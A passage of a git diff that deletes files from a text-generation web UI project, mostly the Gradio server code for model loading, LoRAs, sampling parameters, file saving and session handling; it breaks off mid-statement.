args=None, kwargs=None, callback=None): - self.mfunc = func - self.c_callback = callback - self.q = Queue() - self.sentinel = object() - self.args = args or [] - self.kwargs = kwargs or {} - self.stop_now = False - - def _callback(val): - if self.stop_now or shared.stop_everything: - raise ValueError - self.q.put(val) - - def gentask(): - try: - ret = self.mfunc(callback=_callback, *args, **self.kwargs) - except ValueError: - pass - except: - traceback.print_exc() - pass - - clear_torch_cache() - self.q.put(self.sentinel) - if self.c_callback: - self.c_callback(ret) - - self.thread = Thread(target=gentask) - self.thread.start() - - def __iter__(self): - return self - - def __next__(self): - obj = self.q.get(True, None) - if obj is self.sentinel: - raise StopIteration - else: - return obj - - def __del__(self): - clear_torch_cache() - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - self.stop_now = True - clear_torch_cache() - - -def clear_torch_cache(): - gc.collect() - if not shared.args.cpu: - torch.cuda.empty_cache() diff --git a/spaces/ashercn97/AsherTesting/server.py b/spaces/ashercn97/AsherTesting/server.py deleted file mode 100644 index babdec2dcd9e59b4316ce0ba9d4879e5d6a4a531..0000000000000000000000000000000000000000 --- a/spaces/ashercn97/AsherTesting/server.py +++ /dev/null @@ -1,1181 +0,0 @@ -import os -import warnings - -from modules.logging_colors import logger -from modules.block_requests import OpenMonkeyPatch, RequestBlocker - -os.environ['GRADIO_ANALYTICS_ENABLED'] = 'False' -os.environ['BITSANDBYTES_NOWELCOME'] = '1' -warnings.filterwarnings('ignore', category=UserWarning, message='TypedStorage is deprecated') - -with RequestBlocker(): - import gradio as gr - -import matplotlib -matplotlib.use('Agg') # This fixes LaTeX rendering on some systems - -import importlib -import json -import math -import os -import re -import sys -import time -import traceback -from functools import partial -from pathlib import Path -from threading import Lock - -import psutil -import torch -import yaml -from PIL import Image - -import modules.extensions as extensions_module -from modules import chat, loaders, presets, shared, training, ui, utils -from modules.extensions import apply_extensions -from modules.github import clone_or_pull_repository -from modules.html_generator import chat_html_wrapper -from modules.LoRA import add_lora_to_model -from modules.models import load_model, unload_model -from modules.models_settings import ( - apply_model_settings_to_state, - get_model_settings_from_yamls, - save_model_settings, - update_model_parameters -) -from modules.text_generation import ( - generate_reply_wrapper, - get_encoded_length, - stop_everything_event -) -from modules.utils import gradio - - -def load_model_wrapper(selected_model, loader, autoload=False): - if not autoload: - yield f"The settings for {selected_model} have been updated.\nClick on \"Load\" to load it." - return - - if selected_model == 'None': - yield "No model selected" - else: - try: - yield f"Loading {selected_model}..." - shared.model_name = selected_model - unload_model() - if selected_model != '': - shared.model, shared.tokenizer = load_model(shared.model_name, loader) - - if shared.model is not None: - yield f"Successfully loaded {selected_model}" - else: - yield f"Failed to load {selected_model}." - except: - exc = traceback.format_exc() - logger.error('Failed to load the model.') - print(exc) - yield exc - - -def load_lora_wrapper(selected_loras): - yield ("Applying the following LoRAs to {}:\n\n{}".format(shared.model_name, '\n'.join(selected_loras))) - add_lora_to_model(selected_loras) - yield ("Successfuly applied the LoRAs") - - -def load_prompt(fname): - if fname in ['None', '']: - return '' - elif fname.startswith('Instruct-'): - fname = re.sub('^Instruct-', '', fname) - file_path = Path(f'characters/instruction-following/{fname}.yaml') - if not file_path.exists(): - return '' - - with open(file_path, 'r', encoding='utf-8') as f: - data = yaml.safe_load(f) - output = '' - if 'context' in data: - output += data['context'] - - replacements = { - '<|user|>': data['user'], - '<|bot|>': data['bot'], - '<|user-message|>': 'Input', - } - - output += utils.replace_all(data['turn_template'].split('<|bot-message|>')[0], replacements) - return output.rstrip(' ') - else: - file_path = Path(f'prompts/{fname}.txt') - if not file_path.exists(): - return '' - - with open(file_path, 'r', encoding='utf-8') as f: - text = f.read() - if text[-1] == '\n': - text = text[:-1] - - return text - - -def count_tokens(text): - try: - tokens = get_encoded_length(text) - return f'{tokens} tokens in the input.' - except: - return 'Couldn\'t count the number of tokens. Is a tokenizer loaded?' - - -def download_model_wrapper(repo_id, progress=gr.Progress()): - try: - downloader_module = importlib.import_module("download-model") - downloader = downloader_module.ModelDownloader() - repo_id_parts = repo_id.split(":") - model = repo_id_parts[0] if len(repo_id_parts) > 0 else repo_id - branch = repo_id_parts[1] if len(repo_id_parts) > 1 else "main" - check = False - - progress(0.0) - yield ("Cleaning up the model/branch names") - model, branch = downloader.sanitize_model_and_branch_names(model, branch) - - yield ("Getting the download links from Hugging Face") - links, sha256, is_lora = downloader.get_download_links_from_huggingface(model, branch, text_only=False) - - yield ("Getting the output folder") - base_folder = shared.args.lora_dir if is_lora else shared.args.model_dir - output_folder = downloader.get_output_folder(model, branch, is_lora, base_folder=base_folder) - - if check: - progress(0.5) - yield ("Checking previously downloaded files") - downloader.check_model_files(model, branch, links, sha256, output_folder) - progress(1.0) - else: - yield (f"Downloading files to {output_folder}") - downloader.download_model_files(model, branch, links, sha256, output_folder, progress_bar=progress, threads=1) - yield ("Done!") - except: - progress(1.0) - yield traceback.format_exc() - - -def create_model_menus(): - # Finding the default values for the GPU and CPU memories - total_mem = [] - for i in range(torch.cuda.device_count()): - total_mem.append(math.floor(torch.cuda.get_device_properties(i).total_memory / (1024 * 1024))) - - default_gpu_mem = [] - if shared.args.gpu_memory is not None and len(shared.args.gpu_memory) > 0: - for i in shared.args.gpu_memory: - if 'mib' in i.lower(): - default_gpu_mem.append(int(re.sub('[a-zA-Z ]', '', i))) - else: - default_gpu_mem.append(int(re.sub('[a-zA-Z ]', '', i)) * 1000) - while len(default_gpu_mem) < len(total_mem): - default_gpu_mem.append(0) - - total_cpu_mem = math.floor(psutil.virtual_memory().total / (1024 * 1024)) - if shared.args.cpu_memory is not None: - default_cpu_mem = re.sub('[a-zA-Z ]', '', shared.args.cpu_memory) - else: - default_cpu_mem = 0 - - with gr.Row(): - with gr.Column(): - with gr.Row(): - with gr.Column(): - with gr.Row(): - shared.gradio['model_menu'] = gr.Dropdown(choices=utils.get_available_models(), value=shared.model_name, label='Model', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['model_menu'], lambda: None, lambda: {'choices': utils.get_available_models()}, 'refresh-button') - load = gr.Button("Load", visible=not shared.settings['autoload_model'], elem_classes='refresh-button') - unload = gr.Button("Unload", elem_classes='refresh-button') - reload = gr.Button("Reload", elem_classes='refresh-button') - save_settings = gr.Button("Save settings", elem_classes='refresh-button') - - with gr.Column(): - with gr.Row(): - shared.gradio['lora_menu'] = gr.Dropdown(multiselect=True, choices=utils.get_available_loras(), value=shared.lora_names, label='LoRA(s)', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['lora_menu'], lambda: None, lambda: {'choices': utils.get_available_loras(), 'value': shared.lora_names}, 'refresh-button') - shared.gradio['lora_menu_apply'] = gr.Button(value='Apply LoRAs', elem_classes='refresh-button') - - with gr.Row(): - with gr.Column(): - shared.gradio['loader'] = gr.Dropdown(label="Model loader", choices=["Transformers", "ExLlama_HF", "ExLlama", "AutoGPTQ", "GPTQ-for-LLaMa", "llama.cpp", "llamacpp_HF"], value=None) - with gr.Box(): - with gr.Row(): - with gr.Column(): - for i in range(len(total_mem)): - shared.gradio[f'gpu_memory_{i}'] = gr.Slider(label=f"gpu-memory in MiB for device :{i}", maximum=total_mem[i], value=default_gpu_mem[i]) - - shared.gradio['cpu_memory'] = gr.Slider(label="cpu-memory in MiB", maximum=total_cpu_mem, value=default_cpu_mem) - shared.gradio['transformers_info'] = gr.Markdown('load-in-4bit params:') - shared.gradio['compute_dtype'] = gr.Dropdown(label="compute_dtype", choices=["bfloat16", "float16", "float32"], value=shared.args.compute_dtype) - shared.gradio['quant_type'] = gr.Dropdown(label="quant_type", choices=["nf4", "fp4"], value=shared.args.quant_type) - shared.gradio['threads'] = gr.Slider(label="threads", minimum=0, step=1, maximum=32, value=shared.args.threads) - shared.gradio['n_batch'] = gr.Slider(label="n_batch", minimum=1, maximum=2048, value=shared.args.n_batch) - shared.gradio['n_gpu_layers'] = gr.Slider(label="n-gpu-layers", minimum=0, maximum=128, value=shared.args.n_gpu_layers) - shared.gradio['n_ctx'] = gr.Slider(minimum=0, maximum=16384, step=256, label="n_ctx", value=shared.args.n_ctx) - shared.gradio['wbits'] = gr.Dropdown(label="wbits", choices=["None", 1, 2, 3, 4, 8], value=str(shared.args.wbits) if shared.args.wbits > 0 else "None") - shared.gradio['groupsize'] = gr.Dropdown(label="groupsize", choices=["None", 32, 64, 128, 1024], value=str(shared.args.groupsize) if shared.args.groupsize > 0 else "None") - shared.gradio['model_type'] = gr.Dropdown(label="model_type", choices=["None", "llama", "opt", "gptj"], value=shared.args.model_type or "None") - shared.gradio['pre_layer'] = gr.Slider(label="pre_layer", minimum=0, maximum=100, value=shared.args.pre_layer[0] if shared.args.pre_layer is not None else 0) - shared.gradio['autogptq_info'] = gr.Markdown('* ExLlama_HF is recommended over AutoGPTQ for models derived from LLaMA.') - shared.gradio['gpu_split'] = gr.Textbox(label='gpu-split', info='Comma-separated list of VRAM (in GB) to use per GPU. Example: 20,7,7') - shared.gradio['max_seq_len'] = gr.Slider(label='max_seq_len', minimum=2048, maximum=16384, step=256, info='Maximum sequence length.', value=shared.args.max_seq_len) - shared.gradio['compress_pos_emb'] = gr.Slider(label='compress_pos_emb', minimum=1, maximum=8, step=1, info='Positional embeddings compression factor. Should typically be set to max_seq_len / 2048.', value=shared.args.compress_pos_emb) - shared.gradio['alpha_value'] = gr.Slider(label='alpha_value', minimum=1, maximum=32, step=1, info='Positional embeddings alpha factor for NTK RoPE scaling. Scaling is not identical to embedding compression. Use either this or compress_pos_emb, not both.', value=shared.args.alpha_value) - - with gr.Column(): - shared.gradio['triton'] = gr.Checkbox(label="triton", value=shared.args.triton) - shared.gradio['no_inject_fused_attention'] = gr.Checkbox(label="no_inject_fused_attention", value=shared.args.no_inject_fused_attention, info='Disable fused attention. Fused attention improves inference performance but uses more VRAM. Disable if running low on VRAM.') - shared.gradio['no_inject_fused_mlp'] = gr.Checkbox(label="no_inject_fused_mlp", value=shared.args.no_inject_fused_mlp, info='Affects Triton only. Disable fused MLP. Fused MLP improves performance but uses more VRAM. Disable if running low on VRAM.') - shared.gradio['no_use_cuda_fp16'] = gr.Checkbox(label="no_use_cuda_fp16", value=shared.args.no_use_cuda_fp16, info='This can make models faster on some systems.') - shared.gradio['desc_act'] = gr.Checkbox(label="desc_act", value=shared.args.desc_act, info='\'desc_act\', \'wbits\', and \'groupsize\' are used for old models without a quantize_config.json.') - shared.gradio['cpu'] = gr.Checkbox(label="cpu", value=shared.args.cpu) - shared.gradio['load_in_8bit'] = gr.Checkbox(label="load-in-8bit", value=shared.args.load_in_8bit) - shared.gradio['bf16'] = gr.Checkbox(label="bf16", value=shared.args.bf16) - shared.gradio['auto_devices'] = gr.Checkbox(label="auto-devices", value=shared.args.auto_devices) - shared.gradio['disk'] = gr.Checkbox(label="disk", value=shared.args.disk) - shared.gradio['load_in_4bit'] = gr.Checkbox(label="load-in-4bit", value=shared.args.load_in_4bit) - shared.gradio['use_double_quant'] = gr.Checkbox(label="use_double_quant", value=shared.args.use_double_quant) - shared.gradio['no_mmap'] = gr.Checkbox(label="no-mmap", value=shared.args.no_mmap) - shared.gradio['low_vram'] = gr.Checkbox(label="low-vram", value=shared.args.low_vram) - shared.gradio['mlock'] = gr.Checkbox(label="mlock", value=shared.args.mlock) - shared.gradio['llama_cpp_seed'] = gr.Number(label='Seed (0 for random)', value=shared.args.llama_cpp_seed) - shared.gradio['trust_remote_code'] = gr.Checkbox(label="trust-remote-code", value=shared.args.trust_remote_code, info='Make sure to inspect the .py files inside the model folder before loading it with this option enabled.') - shared.gradio['gptq_for_llama_info'] = gr.Markdown('GPTQ-for-LLaMa is currently 2x faster than AutoGPTQ on some systems. It is installed by default with the one-click installers. Otherwise, it has to be installed manually following the instructions here: [instructions](https://github.com/oobabooga/text-generation-webui/blob/main/docs/GPTQ-models-(4-bit-mode).md#installation-1).') - shared.gradio['exllama_info'] = gr.Markdown('For more information, consult the [docs](https://github.com/oobabooga/text-generation-webui/blob/main/docs/ExLlama.md).') - shared.gradio['exllama_HF_info'] = gr.Markdown('ExLlama_HF is a wrapper that lets you use ExLlama like a Transformers model, which means it can use the Transformers samplers. It\'s a bit slower than the regular ExLlama.') - shared.gradio['llamacpp_HF_info'] = gr.Markdown('llamacpp_HF is a wrapper that lets you use llama.cpp like a Transformers model, which means it can use the Transformers samplers. It works, but it\'s experimental and slow. Contributions are welcome.\n\nTo use it, make sure to first download oobabooga/llama-tokenizer under "Download custom model or LoRA".') - - with gr.Column(): - with gr.Row(): - shared.gradio['autoload_model'] = gr.Checkbox(value=shared.settings['autoload_model'], label='Autoload the model', info='Whether to load the model as soon as it is selected in the Model dropdown.') - - shared.gradio['custom_model_menu'] = gr.Textbox(label="Download custom model or LoRA", info="Enter the Hugging Face username/model path, for instance: facebook/galactica-125m. To specify a branch, add it at the end after a \":\" character like this: facebook/galactica-125m:main") - shared.gradio['download_model_button'] = gr.Button("Download") - - with gr.Row(): - shared.gradio['model_status'] = gr.Markdown('No model is loaded' if shared.model_name == 'None' else 'Ready') - - shared.gradio['loader'].change(loaders.make_loader_params_visible, gradio('loader'), gradio(loaders.get_all_params())) - - # In this event handler, the interface state is read and updated - # with the model defaults (if any), and then the model is loaded - # unless "autoload_model" is unchecked - shared.gradio['model_menu'].change( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - apply_model_settings_to_state, gradio('model_menu', 'interface_state'), gradio('interface_state')).then( - ui.apply_interface_values, gradio('interface_state'), gradio(ui.list_interface_input_elements()), show_progress=False).then( - update_model_parameters, gradio('interface_state'), None).then( - load_model_wrapper, gradio('model_menu', 'loader', 'autoload_model'), gradio('model_status'), show_progress=False) - - load.click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - update_model_parameters, gradio('interface_state'), None).then( - partial(load_model_wrapper, autoload=True), gradio('model_menu', 'loader'), gradio('model_status'), show_progress=False) - - unload.click( - unload_model, None, None).then( - lambda: "Model unloaded", None, gradio('model_status')) - - reload.click( - unload_model, None, None).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - update_model_parameters, gradio('interface_state'), None).then( - partial(load_model_wrapper, autoload=True), gradio('model_menu', 'loader'), gradio('model_status'), show_progress=False) - - save_settings.click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - save_model_settings, gradio('model_menu', 'interface_state'), gradio('model_status'), show_progress=False) - - shared.gradio['lora_menu_apply'].click(load_lora_wrapper, gradio('lora_menu'), gradio('model_status'), show_progress=False) - shared.gradio['download_model_button'].click(download_model_wrapper, gradio('custom_model_menu'), gradio('model_status'), show_progress=True) - shared.gradio['autoload_model'].change(lambda x: gr.update(visible=not x), gradio('autoload_model'), load) - - -def create_chat_settings_menus(): - if not shared.is_chat(): - return - - with gr.Box(): - gr.Markdown("Chat parameters") - with gr.Row(): - with gr.Column(): - shared.gradio['max_new_tokens'] = gr.Slider(minimum=shared.settings['max_new_tokens_min'], maximum=shared.settings['max_new_tokens_max'], step=1, label='max_new_tokens', value=shared.settings['max_new_tokens']) - shared.gradio['chat_generation_attempts'] = gr.Slider(minimum=shared.settings['chat_generation_attempts_min'], maximum=shared.settings['chat_generation_attempts_max'], value=shared.settings['chat_generation_attempts'], step=1, label='Generation attempts (for longer replies)', info='New generations will be called until either this number is reached or no new content is generated between two iterations.') - - with gr.Column(): - shared.gradio['stop_at_newline'] = gr.Checkbox(value=shared.settings['stop_at_newline'], label='Stop generating at new line character') - - -def create_settings_menus(default_preset): - generate_params = presets.load_preset(default_preset) - with gr.Row(): - with gr.Column(): - with gr.Row(): - shared.gradio['preset_menu'] = gr.Dropdown(choices=utils.get_available_presets(), value=default_preset if not shared.args.flexgen else 'Naive', label='Generation parameters preset', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['preset_menu'], lambda: None, lambda: {'choices': utils.get_available_presets()}, 'refresh-button') - shared.gradio['save_preset'] = gr.Button('💾', elem_classes='refresh-button') - shared.gradio['delete_preset'] = gr.Button('🗑️', elem_classes='refresh-button') - - with gr.Column(): - shared.gradio['seed'] = gr.Number(value=shared.settings['seed'], label='Seed (-1 for random)') - - with gr.Row(): - with gr.Column(): - with gr.Box(): - gr.Markdown('Main parameters') - with gr.Row(): - with gr.Column(): - shared.gradio['temperature'] = gr.Slider(0.01, 1.99, value=generate_params['temperature'], step=0.01, label='temperature') - shared.gradio['top_p'] = gr.Slider(0.0, 1.0, value=generate_params['top_p'], step=0.01, label='top_p') - shared.gradio['top_k'] = gr.Slider(0, 200, value=generate_params['top_k'], step=1, label='top_k') - shared.gradio['typical_p'] = gr.Slider(0.0, 1.0, value=generate_params['typical_p'], step=0.01, label='typical_p') - shared.gradio['epsilon_cutoff'] = gr.Slider(0, 9, value=generate_params['epsilon_cutoff'], step=0.01, label='epsilon_cutoff') - shared.gradio['eta_cutoff'] = gr.Slider(0, 20, value=generate_params['eta_cutoff'], step=0.01, label='eta_cutoff') - - with gr.Column(): - shared.gradio['repetition_penalty'] = gr.Slider(1.0, 1.5, value=generate_params['repetition_penalty'], step=0.01, label='repetition_penalty') - shared.gradio['repetition_penalty_range'] = gr.Slider(0, 4096, step=64, value=generate_params['repetition_penalty_range'], label='repetition_penalty_range') - shared.gradio['encoder_repetition_penalty'] = gr.Slider(0.8, 1.5, value=generate_params['encoder_repetition_penalty'], step=0.01, label='encoder_repetition_penalty') - shared.gradio['no_repeat_ngram_size'] = gr.Slider(0, 20, step=1, value=generate_params['no_repeat_ngram_size'], label='no_repeat_ngram_size') - shared.gradio['min_length'] = gr.Slider(0, 2000, step=1, value=generate_params['min_length'], label='min_length') - shared.gradio['tfs'] = gr.Slider(0.0, 1.0, value=generate_params['tfs'], step=0.01, label='tfs') - shared.gradio['top_a'] = gr.Slider(0.0, 1.0, value=generate_params['top_a'], step=0.01, label='top_a') - shared.gradio['do_sample'] = gr.Checkbox(value=generate_params['do_sample'], label='do_sample') - - with gr.Accordion("Learn more", open=False): - gr.Markdown(""" - - Not all parameters are used by all loaders. See [this page](https://github.com/oobabooga/text-generation-webui/blob/main/docs/Generation-parameters.md) for details. - - For a technical description of the parameters, the [transformers documentation](https://huggingface.co/docs/transformers/main_classes/text_generation#transformers.GenerationConfig) is a good reference. - - The best presets, according to the [Preset Arena](https://github.com/oobabooga/oobabooga.github.io/blob/main/arena/results.md) experiment, are: - - * Instruction following: - 1) Divine Intellect - 2) Big O - 3) simple-1 - 4) Space Alien - 5) StarChat - 6) Titanic - 7) tfs-with-top-a - 8) Asterism - 9) Contrastive Search - - * Chat: - 1) Midnight Enigma - 2) Yara - 3) Shortwave - 4) Kobold-Godlike - - ### Temperature - Primary factor to control randomness of outputs. 0 = deterministic (only the most likely token is used). Higher value = more randomness. - ### top_p - If not set to 1, select tokens with probabilities adding up to less than this number. Higher value = higher range of possible random results. - ### top_k - Similar to top_p, but select instead only the top_k most likely tokens. Higher value = higher range of possible random results. - ### typical_p - If not set to 1, select only tokens that are at least this much more likely to appear than random tokens, given the prior text. - ### epsilon_cutoff - In units of 1e-4; a reasonable value is 3. This sets a probability floor below which tokens are excluded from being sampled. Should be used with top_p, top_k, and eta_cutoff set to 0. - ### eta_cutoff - In units of 1e-4; a reasonable value is 3. Should be used with top_p, top_k, and epsilon_cutoff set to 0. - ### repetition_penalty - Exponential penalty factor for repeating prior tokens. 1 means no penalty, higher value = less repetition, lower value = more repetition. - ### repetition_penalty_range - The number of most recent tokens to consider for repetition penalty. 0 makes all tokens be used. - ### encoder_repetition_penalty - Also known as the "Hallucinations filter". Used to penalize tokens that are *not* in the prior text. Higher value = more likely to stay in context, lower value = more likely to diverge. - ### no_repeat_ngram_size - If not set to 0, specifies the length of token sets that are completely blocked from repeating at all. Higher values = blocks larger phrases, lower values = blocks words or letters from repeating. Only 0 or high values are a good idea in most cases. - ### min_length - Minimum generation length in tokens. - ### penalty_alpha - Contrastive Search is enabled by setting this to greater than zero and unchecking "do_sample". It should be used with a low value of top_k, for instance, top_k = 4. - - """, elem_classes="markdown") - - with gr.Column(): - create_chat_settings_menus() - with gr.Box(): - with gr.Row(): - with gr.Column(): - gr.Markdown('Contrastive search') - shared.gradio['penalty_alpha'] = gr.Slider(0, 5, value=generate_params['penalty_alpha'], label='penalty_alpha') - - gr.Markdown('Beam search') - shared.gradio['num_beams'] = gr.Slider(1, 20, step=1, value=generate_params['num_beams'], label='num_beams') - shared.gradio['length_penalty'] = gr.Slider(-5, 5, value=generate_params['length_penalty'], label='length_penalty') - shared.gradio['early_stopping'] = gr.Checkbox(value=generate_params['early_stopping'], label='early_stopping') - - with gr.Column(): - gr.Markdown('Mirostat (mode=1 is only for llama.cpp)') - shared.gradio['mirostat_mode'] = gr.Slider(0, 2, step=1, value=generate_params['mirostat_mode'], label='mirostat_mode') - shared.gradio['mirostat_tau'] = gr.Slider(0, 10, step=0.01, value=generate_params['mirostat_tau'], label='mirostat_tau') - shared.gradio['mirostat_eta'] = gr.Slider(0, 1, step=0.01, value=generate_params['mirostat_eta'], label='mirostat_eta') - - with gr.Box(): - with gr.Row(): - with gr.Column(): - shared.gradio['truncation_length'] = gr.Slider(value=shared.settings['truncation_length'], minimum=shared.settings['truncation_length_min'], maximum=shared.settings['truncation_length_max'], step=256, label='Truncate the prompt up to this length', info='The leftmost tokens are removed if the prompt exceeds this length. Most models require this to be at most 2048.') - shared.gradio['custom_stopping_strings'] = gr.Textbox(lines=1, value=shared.settings["custom_stopping_strings"] or None, label='Custom stopping strings', info='In addition to the defaults. Written between "" and separated by commas. For instance: "\\nYour Assistant:", "\\nThe assistant:"') - with gr.Column(): - shared.gradio['ban_eos_token'] = gr.Checkbox(value=shared.settings['ban_eos_token'], label='Ban the eos_token', info='Forces the model to never end the generation prematurely.') - shared.gradio['add_bos_token'] = gr.Checkbox(value=shared.settings['add_bos_token'], label='Add the bos_token to the beginning of prompts', info='Disabling this can make the replies more creative.') - - shared.gradio['skip_special_tokens'] = gr.Checkbox(value=shared.settings['skip_special_tokens'], label='Skip special tokens', info='Some specific models need this unset.') - shared.gradio['stream'] = gr.Checkbox(value=not shared.args.no_stream, label='Activate text streaming') - - shared.gradio['preset_menu'].change(presets.load_preset_for_ui, gradio('preset_menu', 'interface_state'), gradio('interface_state', 'do_sample', 'temperature', 'top_p', 'typical_p', 'epsilon_cutoff', 'eta_cutoff', 'repetition_penalty', 'repetition_penalty_range', 'encoder_repetition_penalty', 'top_k', 'min_length', 'no_repeat_ngram_size', 'num_beams', 'penalty_alpha', 'length_penalty', 'early_stopping', 'mirostat_mode', 'mirostat_tau', 'mirostat_eta', 'tfs', 'top_a')) - - -def create_file_saving_menus(): - - # Text file saver - with gr.Box(visible=False, elem_classes='file-saver') as shared.gradio['file_saver']: - shared.gradio['save_filename'] = gr.Textbox(lines=1, label='File name') - shared.gradio['save_root'] = gr.Textbox(lines=1, label='File folder', info='For reference. Unchangeable.', interactive=False) - shared.gradio['save_contents'] = gr.Textbox(lines=10, label='File contents') - with gr.Row(): - shared.gradio['save_confirm'] = gr.Button('Save', elem_classes="small-button") - shared.gradio['save_cancel'] = gr.Button('Cancel', elem_classes="small-button") - - # Text file deleter - with gr.Box(visible=False, elem_classes='file-saver') as shared.gradio['file_deleter']: - shared.gradio['delete_filename'] = gr.Textbox(lines=1, label='File name') - shared.gradio['delete_root'] = gr.Textbox(lines=1, label='File folder', info='For reference. Unchangeable.', interactive=False) - with gr.Row(): - shared.gradio['delete_confirm'] = gr.Button('Delete', elem_classes="small-button", variant='stop') - shared.gradio['delete_cancel'] = gr.Button('Cancel', elem_classes="small-button") - - # Character saver/deleter - if shared.is_chat(): - with gr.Box(visible=False, elem_classes='file-saver') as shared.gradio['character_saver']: - shared.gradio['save_character_filename'] = gr.Textbox(lines=1, label='File name', info='The character will be saved to your characters/ folder with this base filename.') - with gr.Row(): - shared.gradio['save_character_confirm'] = gr.Button('Save', elem_classes="small-button") - shared.gradio['save_character_cancel'] = gr.Button('Cancel', elem_classes="small-button") - - with gr.Box(visible=False, elem_classes='file-saver') as shared.gradio['character_deleter']: - gr.Markdown('Confirm the character deletion?') - with gr.Row(): - shared.gradio['delete_character_confirm'] = gr.Button('Delete', elem_classes="small-button", variant='stop') - shared.gradio['delete_character_cancel'] = gr.Button('Cancel', elem_classes="small-button") - - -def create_file_saving_event_handlers(): - shared.gradio['save_confirm'].click( - lambda x, y, z: utils.save_file(x + y, z), gradio('save_root', 'save_filename', 'save_contents'), None).then( - lambda: gr.update(visible=False), None, gradio('file_saver')) - - shared.gradio['delete_confirm'].click( - lambda x, y: utils.delete_file(x + y), gradio('delete_root', 'delete_filename'), None).then( - lambda: gr.update(visible=False), None, gradio('file_deleter')) - - shared.gradio['delete_cancel'].click(lambda: gr.update(visible=False), None, gradio('file_deleter')) - shared.gradio['save_cancel'].click(lambda: gr.update(visible=False), None, gradio('file_saver')) - if shared.is_chat(): - shared.gradio['save_character_confirm'].click( - chat.save_character, gradio('name2', 'greeting', 'context', 'character_picture', 'save_character_filename'), None).then( - lambda: gr.update(visible=False), None, gradio('character_saver')) - - shared.gradio['delete_character_confirm'].click( - chat.delete_character, gradio('character_menu'), None).then( - lambda: gr.update(visible=False), None, gradio('character_deleter')).then( - lambda: gr.update(choices=utils.get_available_characters()), None, gradio('character_menu')) - - shared.gradio['save_character_cancel'].click(lambda: gr.update(visible=False), None, gradio('character_saver')) - shared.gradio['delete_character_cancel'].click(lambda: gr.update(visible=False), None, gradio('character_deleter')) - - shared.gradio['save_preset'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - presets.generate_preset_yaml, gradio('interface_state'), gradio('save_contents')).then( - lambda: 'presets/', None, gradio('save_root')).then( - lambda: 'My Preset.yaml', None, gradio('save_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['delete_preset'].click( - lambda x: f'{x}.yaml', gradio('preset_menu'), gradio('delete_filename')).then( - lambda: 'presets/', None, gradio('delete_root')).then( - lambda: gr.update(visible=True), None, gradio('file_deleter')) - - if not shared.args.multi_user: - - def load_session(session, state): - with open(Path(f'logs/{session}.json'), 'r') as f: - state.update(json.loads(f.read())) - - if shared.is_chat(): - chat.save_persistent_history(state['history'], state['character_menu'], state['mode']) - - return state - - if shared.is_chat(): - shared.gradio['save_session'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: json.dumps(x, indent=4), gradio('interface_state'), gradio('save_contents')).then( - lambda: 'logs/', None, gradio('save_root')).then( - lambda x: f'session_{shared.get_mode()}_{x + "_" if x not in ["None", None, ""] else ""}{utils.current_time()}.json', gradio('character_menu'), gradio('save_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['session_menu'].change( - load_session, gradio('session_menu', 'interface_state'), gradio('interface_state')).then( - ui.apply_interface_values, gradio('interface_state'), gradio(ui.list_interface_input_elements()), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - else: - shared.gradio['save_session'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: json.dumps(x, indent=4), gradio('interface_state'), gradio('save_contents')).then( - lambda: 'logs/', None, gradio('save_root')).then( - lambda: f'session_{shared.get_mode()}_{utils.current_time()}.json', None, gradio('save_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['session_menu'].change( - load_session, gradio('session_menu', 'interface_state'), gradio('interface_state')).then( - ui.apply_interface_values, gradio('interface_state'), gradio(ui.list_interface_input_elements()), show_progress=False) - - shared.gradio['delete_session'].click( - lambda x: f'{x}.json', gradio('session_menu'), gradio('delete_filename')).then( - lambda: 'logs/', None, gradio('delete_root')).then( - lambda: gr.update(visible=True), None, gradio('file_deleter')) - - -def set_interface_arguments(interface_mode, extensions, bool_active): - modes = ["default", "notebook", "chat", "cai_chat"] - cmd_list = vars(shared.args) - bool_list = [k for k in cmd_list if type(cmd_list[k]) is bool and k not in modes] - - shared.args.extensions = extensions - for k in modes[1:]: - setattr(shared.args, k, False) - if interface_mode != "default": - setattr(shared.args, interface_mode, True) - - for k in bool_list: - setattr(shared.args, k, False) - for k in bool_active: - setattr(shared.args, k, True) - - shared.need_restart = True - - -def create_interface(): - - # Defining some variables - gen_events = [] - default_preset = shared.settings['preset'] - default_text = load_prompt(shared.settings['prompt']) - title = 'Text generation web UI' - - # Authentication variables - auth = None - gradio_auth_creds = [] - if shared.args.gradio_auth: - gradio_auth_creds += [x.strip() for x in shared.args.gradio_auth.strip('"').replace('\n', '').split(',') if x.strip()] - if shared.args.gradio_auth_path is not None: - with open(shared.args.gradio_auth_path, 'r', encoding="utf8") as file: - for line in file.readlines(): - gradio_auth_creds += [x.strip() for x in line.split(',') if x.strip()] - if gradio_auth_creds: - auth = [tuple(cred.split(':')) for cred in gradio_auth_creds] - - # Importing the extension files and executing their setup() functions - if shared.args.extensions is not None and len(shared.args.extensions) > 0: - extensions_module.load_extensions() - - # css/js strings - css = ui.css if not shared.is_chat() else ui.css + ui.chat_css - js = ui.main_js if not shared.is_chat() else ui.main_js + ui.chat_js - css += apply_extensions('css') - js += apply_extensions('js') - - with gr.Blocks(css=css, analytics_enabled=False, title=title, theme=ui.theme) as shared.gradio['interface']: - if Path("notification.mp3").exists(): - shared.gradio['audio_notification'] = gr.Audio(interactive=False, value="notification.mp3", elem_id="audio_notification", visible=False) - audio_notification_js = "document.querySelector('#audio_notification audio')?.play();" - else: - audio_notification_js = "" - - # Floating menus for saving/deleting files - create_file_saving_menus() - - # Create chat mode interface - if shared.is_chat(): - shared.input_elements = ui.list_interface_input_elements() - - shared.gradio.update({ - 'interface_state': gr.State({k: None for k in shared.input_elements}), - 'Chat input': gr.State(), - 'dummy': gr.State(), - 'history': 